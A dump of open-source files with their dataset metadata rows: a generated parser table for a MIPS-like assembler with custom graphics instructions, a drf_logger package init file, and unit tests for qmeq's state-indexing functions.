,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'NOR':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[9,9,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'OR':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[10,10,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'SLT':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[11,11,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'SLL':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[12,12,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22
,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'SRL':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[13,13,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'SUB':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[14,14,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'ADDI':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[15,15,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'BEQ':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[16,16,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'BNE':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[17,17,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'LW':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[18,18,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'SLTI':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[19,19,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'SW':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,15
5,],[20,20,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'JAL':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[21,21,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'J':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[22,22,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'MOVE':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[23,23,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'MPP':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[24,24,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'MPPI':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[25,25,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'PPXL':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[26,26,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'PTMU':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[27,27,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'PTML':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133
,136,138,139,143,147,148,149,150,151,152,153,154,155,],[28,28,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'PTMD':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[29,29,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'PTMR':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[30,30,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'PPXLC':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[31,31,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'PMPXL':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[32,32,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'CS':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[33,33,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'SPNT':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[34,34,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'MPNT':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[35,35,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'$end':([0,1,2,3,4
,6,36,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[-35,0,-1,-35,-3,-5,-2,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'DP':([5,],[37,]),'REG':([7,8,9,10,11,12,13,14,15,16,17,18,19,20,23,24,26,27,28,29,30,31,32,33,34,35,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,84,85,86,87,88,111,112,113,114,115,118,],[38,39,40,41,42,43,44,45,46,47,48,49,50,51,54,55,57,58,59,60,61,62,63,64,65,66,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,106,107,108,109,110,129,130,131,132,133,136,]),'NUM':([25,105,116,117,119,122,123,124,126,127,128,],[56,125,134,135,137,140,141,142,144,145,146,]),'COMMA':([38,39,40,41,42,43,44,45,46,47,48,49,50,51,54,55,62,63,64,65,66,83,89,90,91,92,93,94,95,96,97,98,99,100,101,102,108,109,110,],[67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,84,85,86,87,88,105,111,112,113,114,115,116,117,118,119,120,121,122,123,124,126,127,128,]),'NUMBER':([56,125,134,135,137,140,141,142,144,145,146,],[83,143,147,148,149,150,151,152,153,154,155,]),}
_lr_action = { }
for _k, _v in _lr_action_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_action: _lr_action[_x] = { }
_lr_action[_x][_k] = _y
del _lr_action_items
_lr_goto_items = {'program':([0,],[1,]),'block':([0,3,],[2,36,]),'inst':([0,3,],[3,3,]),'empty':([0,3,],[4,4,]),}
_lr_goto = { }
for _k, _v in _lr_goto_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_goto: _lr_goto[_x] = { }
_lr_goto[_x][_k] = _y
del _lr_goto_items
_lr_productions = [
("S' -> program","S'",1,None,None,None),
('program -> block','program',1,'p_program','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',20),
('block -> inst block','block',2,'p_block','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',26),
('block -> empty','block',1,'p_blockEmpty','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',30),
('inst -> ID DP','inst',2,'p_instTag','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',34),
('inst -> NOP','inst',1,'p_instNOP','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',38),
('inst -> ADD REG COMMA REG COMMA REG','inst',6,'p_instADD','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',44),
('inst -> AND REG COMMA REG COMMA REG','inst',6,'p_instAND','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',48),
('inst -> NOR REG COMMA REG COMMA REG','inst',6,'p_instNOR','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',52),
('inst -> OR REG COMMA REG COMMA REG','inst',6,'p_instOR','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',56),
('inst -> SLT REG COMMA REG COMMA REG','inst',6,'p_instSLT','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',60),
('inst -> SLL REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instSLL','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',64),
('inst -> SRL REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instSRL','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',68),
('inst -> SUB REG COMMA REG COMMA REG','inst',6,'p_instSUB','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',72),
('inst -> ADDI REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instADDI','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',78),
('inst -> BEQ REG COMMA REG COMMA ID','inst',6,'p_instBEQ','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',82),
('inst -> BNE REG COMMA REG COMMA ID','inst',6,'p_instBNE','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',86),
('inst -> LW REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instLW','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',90),
('inst -> SLTI REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instSLTI','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',94),
('inst -> SW REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instSW','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',98),
('inst -> JAL ID','inst',2,'p_instJAL','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',104),
('inst -> J ID','inst',2,'p_instJ','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',108),
('inst -> MOVE REG COMMA REG','inst',4,'p_instMOVE','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',113),
('inst -> MPP REG COMMA REG','inst',4,'p_instMPP','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',120),
('inst -> MPPI NUM NUMBER COMMA NUM NUMBER','inst',6,'p_instMPPI','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',125),
('inst -> PPXL REG','inst',2,'p_instPPXL','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',130),
('inst -> PTMU REG','inst',2,'p_instPTMU','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',135),
('inst -> PTML REG','inst',2,'p_instPTML','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',141),
('inst -> PTMD REG','inst',2,'p_instPTMD','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',147),
('inst -> PTMR REG','inst',2,'p_instPTMR','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',152),
('inst -> PPXLC REG COMMA REG','inst',4,'p_instPPXLC','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',157),
('inst -> PMPXL REG COMMA REG','inst',4,'p_instPMPXL','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',162),
('inst -> CS REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instCS','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',167),
('inst -> SPNT REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instSPNT','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',173),
('inst -> MPNT REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instMPNT','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',178),
('empty -> <empty>','empty',0,'p_empty','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',184),
]
| 221.569231 | 9,109 | 0.620955 | 3,131 | 14,402 | 2.824976 | 0.087193 | 0.03437 | 0.047484 | 0.083098 | 0.839797 | 0.829169 | 0.815376 | 0.605653 | 0.583267 | 0.551724 | 0 | 0.384903 | 0.034162 | 14,402 | 64 | 9,110 | 225.03125 | 0.250971 | 0.004305 | 0 | 0.036364 | 1 | 0 | 0.273753 | 0.159403 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b7937a9012d9f497511712f6cbff51a032832a95 | 158 | py | Python | drf_logger/__init__.py | thatch/drf-logger | aa6c802c29ab5274c4facbcc2ca4aed9c1c2337a | [
"MIT"
] | null | null | null | drf_logger/__init__.py | thatch/drf-logger | aa6c802c29ab5274c4facbcc2ca4aed9c1c2337a | [
"MIT"
] | null | null | null | drf_logger/__init__.py | thatch/drf-logger | aa6c802c29ab5274c4facbcc2ca4aed9c1c2337a | [
"MIT"
] | null | null | null | from drf_logger import decorators
from drf_logger import formatters
from drf_logger import mixins
from drf_logger import utils
from drf_logger import version
| 26.333333 | 33 | 0.873418 | 25 | 158 | 5.32 | 0.36 | 0.263158 | 0.488722 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126582 | 158 | 5 | 34 | 31.6 | 0.963768 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
b7a2e2f2c6ac58da00266f49fc6d0517ffc7dd6b | 27,609 | py | Python | qmeq/tests/test_indexing.py | M-Josefsson/qmeq | f4f08864fc778de7c14b198c0ffbaafe33ce18f6 | [
"BSD-2-Clause"
] | 16 | 2016-12-14T09:21:16.000Z | 2022-02-23T08:01:45.000Z | qmeq/tests/test_indexing.py | M-Josefsson/qmeq | f4f08864fc778de7c14b198c0ffbaafe33ce18f6 | [
"BSD-2-Clause"
] | 3 | 2018-02-03T19:13:01.000Z | 2021-06-09T14:10:28.000Z | qmeq/tests/test_indexing.py | M-Josefsson/qmeq | f4f08864fc778de7c14b198c0ffbaafe33ce18f6 | [
"BSD-2-Clause"
] | 7 | 2017-07-09T04:46:42.000Z | 2021-04-26T16:27:55.000Z | from qmeq.indexing import *
def test_binarylist_to_integer():
assert binarylist_to_integer([1, 0, 1, 1, 0, 0]) == 44
def test_integer_to_binarylist():
assert integer_to_binarylist(33) == [1, 0, 0, 0, 0, 1]
assert integer_to_binarylist(33, strq=True) == '100001'
assert integer_to_binarylist(33, binlen=8) == [0, 0, 1, 0, 0, 0, 0, 1]
assert integer_to_binarylist(33, binlen=8, strq=True) == '00100001'
def test_construct_chargelst():
assert construct_chargelst(4) == [[0],
[1, 2, 4, 8],
[3, 5, 6, 9, 10, 12],
[7, 11, 13, 14],
[15]]
def test_sz_to_ind():
assert sz_to_ind(-2, 4, 6) == 0
assert sz_to_ind( 0, 4, 6) == 1
assert sz_to_ind(+2, 4, 6) == 2
def test_szrange():
assert szrange(2, 6) == [-2, 0, 2]
assert szrange(3, 6) == [-3, -1, 1, 3]
assert szrange(4, 6) == [-2, 0, 2]
def test_empty_szlst():
assert empty_szlst(4) == [[[]],
[[], []],
[[], [], []],
[[], []],
[[]]]
assert empty_szlst(4, noneq=True) == [[None],
[None, None],
[None, None, None],
[None, None],
[None]]
def test_construct_szlst():
assert construct_szlst(4) == [[[0]],
[[1, 2], [4, 8]],
[[3], [5, 6, 9, 10], [12]],
[[7, 11], [13, 14]],
[[15]]]
def test_ssq_to_ind():
assert ssq_to_ind(2, -2) == 0
assert ssq_to_ind(2, 0) == 1
assert ssq_to_ind(2, +2) == 0
def test_ssqrange():
assert ssqrange(3, 1, 6) == [1, 3]
assert ssqrange(4, 0, 6) == [0, 2]
def test_empty_ssqlst():
assert empty_ssqlst(4) == [[[[]]],
[[[]], [[]]],
[[[]], [[], []], [[]]],
[[[]], [[]]],
[[[]]]]
assert empty_ssqlst(4, noneq=True) == [[[None]],
[[None], [None]],
[[None], [None, None], [None]],
[[None], [None]],
[[None]]]
def test_construct_ssqlst():

szlst = construct_szlst(4)
assert construct_ssqlst(szlst, 4) == [[[[0]]],
[[[1, 2]], [[3, 4]]],
[[[5]], [[6, 7, 8], [9]], [[10]]],
[[[11, 12]], [[13, 14]]],
[[[15]]]]
def test_flatten():
szlst = construct_szlst(4)
ssqlst = construct_ssqlst(szlst, 4)
f1 = flatten(ssqlst)
f2 = flatten(f1)
f3 = flatten(f2)
assert f1 == [[[0]], [[1, 2]], [[3, 4]], [[5]], [[6, 7, 8], [9]], [[10]], [[11, 12]], [[13, 14]], [[15]]]
assert f2 == [[0], [1, 2], [3, 4], [5], [6, 7, 8], [9], [10], [11, 12], [13, 14], [15]]
assert f3 == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
def test_enum_chargelst():
chargelst_lin = construct_chargelst(4)
assert enum_chargelst(chargelst_lin) == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15]]
def test_enum_szlst():
szlst_lin = construct_szlst(4)
assert enum_szlst(szlst_lin) == [[[0]], [[1, 2], [3, 4]], [[5], [6, 7, 8, 9], [10]], [[11, 12], [13, 14]], [[15]]]
def test_make_inverse_map():
chargelst_lin = construct_chargelst(4)
i = flatten(chargelst_lin)
assert make_inverse_map(i) == [0, 1, 2, 5, 3, 6, 7, 11, 4, 8, 9, 12, 10, 13, 14, 15]
def test_make_quantum_numbers():
si = StateIndexing(4, indexing='Lin')
qn_ind, ind_qn = make_quantum_numbers(si)
assert qn_ind == {(1, 2): 4, (2, 5): 12, (0, 0): 0, (3, 3): 14, (3, 0): 7, (3, 1): 11, (3, 2): 13, (2, 1): 5, (2, 4): 10, (2, 0): 3, (1, 3): 8, (2, 3): 9, (2, 2): 6, (1, 0): 1, (1, 1): 2, (4, 0): 15}
assert ind_qn == {0: (0, 0), 1: (1, 0), 2: (1, 1), 3: (2, 0), 4: (1, 2), 5: (2, 1), 6: (2, 2), 7: (3, 0), 8: (1, 3), 9: (2, 3), 10: (2, 4), 11: (3, 1), 12: (2, 5), 13: (3, 2), 14: (3, 3), 15: (4, 0)}
#
si = StateIndexing(4, indexing='charge')
qn_ind, ind_qn = make_quantum_numbers(si)
assert qn_ind == {(1, 2): 3, (2, 5): 10, (0, 0): 0, (3, 3): 14, (3, 0): 11, (3, 1): 12, (3, 2): 13, (2, 1): 6, (2, 4): 9, (2, 0): 5, (1, 3): 4, (2, 3): 8, (2, 2): 7, (1, 0): 1, (1, 1): 2, (4, 0): 15}
assert ind_qn == {0: (0, 0), 1: (1, 0), 2: (1, 1), 3: (1, 2), 4: (1, 3), 5: (2, 0), 6: (2, 1), 7: (2, 2), 8: (2, 3), 9: (2, 4), 10: (2, 5), 11: (3, 0), 12: (3, 1), 13: (3, 2), 14: (3, 3), 15: (4, 0)}
#
si = StateIndexing(4, indexing='sz')
qn_ind, ind_qn = make_quantum_numbers(si)
assert qn_ind == {(3, -1, 1): 12, (1, 1, 0): 3, (2, -2, 0): 5, (2, 0, 3): 9, (4, 0, 0): 15, (2, 0, 2): 8, (1, -1, 0): 1, (2, 2, 0): 10, (3, 1, 0): 13, (0, 0, 0): 0, (1, -1, 1): 2, (2, 0, 1): 7, (3, 1, 1): 14, (3, -1, 0): 11, (1, 1, 1): 4, (2, 0, 0): 6}
assert ind_qn == {0: (0, 0, 0), 1: (1, -1, 0), 2: (1, -1, 1), 3: (1, 1, 0), 4: (1, 1, 1), 5: (2, -2, 0), 6: (2, 0, 0), 7: (2, 0, 1), 8: (2, 0, 2), 9: (2, 0, 3), 10: (2, 2, 0), 11: (3, -1, 0), 12: (3, -1, 1), 13: (3, 1, 0), 14: (3, 1, 1), 15: (4, 0, 0)}
#
si = StateIndexing(4, indexing='ssq')
qn_ind, ind_qn = make_quantum_numbers(si)
assert qn_ind == {(0, 0, 0, 0): 0,
(1, -1, 1, 0): 1,
(1, -1, 1, 1): 2,
(1, 1, 1, 0): 3,
(1, 1, 1, 1): 4,
(2, -2, 2, 0): 5,
(2, 0, 0, 0): 6,
(2, 0, 0, 1): 7,
(2, 0, 0, 2): 8,
(2, 0, 2, 0): 9,
(2, 2, 2, 0): 10,
(3, -1, 1, 0): 11,
(3, -1, 1, 1): 12,
(3, 1, 1, 0): 13,
(3, 1, 1, 1): 14,
(4, 0, 0, 0): 15}
assert ind_qn == {0: (0, 0, 0, 0),
1: (1, -1, 1, 0),
2: (1, -1, 1, 1),
3: (1, 1, 1, 0),
4: (1, 1, 1, 1),
5: (2, -2, 2, 0),
6: (2, 0, 0, 0),
7: (2, 0, 0, 1),
8: (2, 0, 0, 2),
9: (2, 0, 2, 0),
10: (2, 2, 2, 0),
11: (3, -1, 1, 0),
12: (3, -1, 1, 1),
13: (3, 1, 1, 0),
14: (3, 1, 1, 1),
15: (4, 0, 0, 0)}
def test_StateIndexing():
si = StateIndexing(4)
assert si.nsingle == 4
assert si.indexing == 'Lin'
assert si.ncharge == 5
assert si.nmany == 16
assert si.nleads == 0
#
for indexing in ['Lin', None]:
si = StateIndexing(4, indexing=indexing)
assert si.chargelst == [[0],[1, 2, 4, 8],[3, 5, 6, 9, 10, 12],[7, 11, 13, 14],[15]]
assert si.i == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
assert si.j == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
#
si = StateIndexing(4, indexing='charge')
assert si.chargelst_lin == [[0], [1, 2, 4, 8], [3, 5, 6, 9, 10, 12], [7, 11, 13, 14], [15]]
assert si.chargelst == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15]]
assert si.i == [0, 1, 2, 4, 8, 3, 5, 6, 9, 10, 12, 7, 11, 13, 14, 15]
assert si.j == [0, 1, 2, 5, 3, 6, 7, 11, 4, 8, 9, 12, 10, 13, 14, 15]
#
for indexing in ['sz', 'ssq']:
si = StateIndexing(4, indexing=indexing)
assert si.chargelst_lin == [[0], [1, 2, 4, 8], [3, 5, 6, 9, 10, 12], [7, 11, 13, 14], [15]]
assert si.chargelst == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15]]
assert si.szlst_lin == [[[0]], [[1, 2], [4, 8]], [[3], [5, 6, 9, 10], [12]], [[7, 11], [13, 14]], [[15]]]
assert si.szlst == [[[0]], [[1, 2], [3, 4]], [[5], [6, 7, 8, 9], [10]], [[11, 12], [13, 14]], [[15]]]
assert si.i == [0, 1, 2, 4, 8, 3, 5, 6, 9, 10, 12, 7, 11, 13, 14, 15]
assert si.j == [0, 1, 2, 5, 3, 6, 7, 11, 4, 8, 9, 12, 10, 13, 14, 15]
#
si = StateIndexing(4, indexing='ssq')
assert si.ssqlst == [[[[0]]], [[[1, 2]], [[3, 4]]], [[[5]], [[6, 7, 8], [9]], [[10]]], [[[11, 12]], [[13, 14]]], [[[15]]]]
assert si.get_state(6) == [0, 1, 0, 1]
assert si.get_state(6, linq=True) == [0, 1, 1, 0]
assert si.get_state(6, strq=True) == '0101'
assert si.get_state(6, linq=True, strq=True) == '0110'
assert si.get_ind([0, 1, 0, 1]) == 6
assert si.get_ind([0, 1, 1, 0], linq=True) == 6
assert si.get_lst(charge=2) == [5, 6, 7, 8, 9, 10]
assert si.get_lst(charge=2, sz=0) == [6, 7, 8, 9]
assert si.get_lst(charge=2, sz=0, ssq=0) == [6, 7, 8]
def test_StateIndexingPauli_charge():
si = StateIndexingPauli(4, indexing='charge')
assert si.npauli_ == 16
assert si.npauli == 16
assert list(si.shiftlst0) == [0, 1, 5, 11, 15, 16]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15], []]
assert list(si.mapdm0) == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
assert list(si.booldm0) == [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
assert si.get_ind_dm0(8, 8, 2, maptype=0) == 8
assert si.get_ind_dm0(8, 8, 2, maptype=1) == 8
assert si.get_ind_dm0(8, 8, 2, maptype=2) == 1
#
si.set_statesdm([[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], []])
assert si.npauli_ == 11
assert si.npauli == 11
assert list(si.shiftlst0) == [0, 1, 1, 7, 11, 11]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
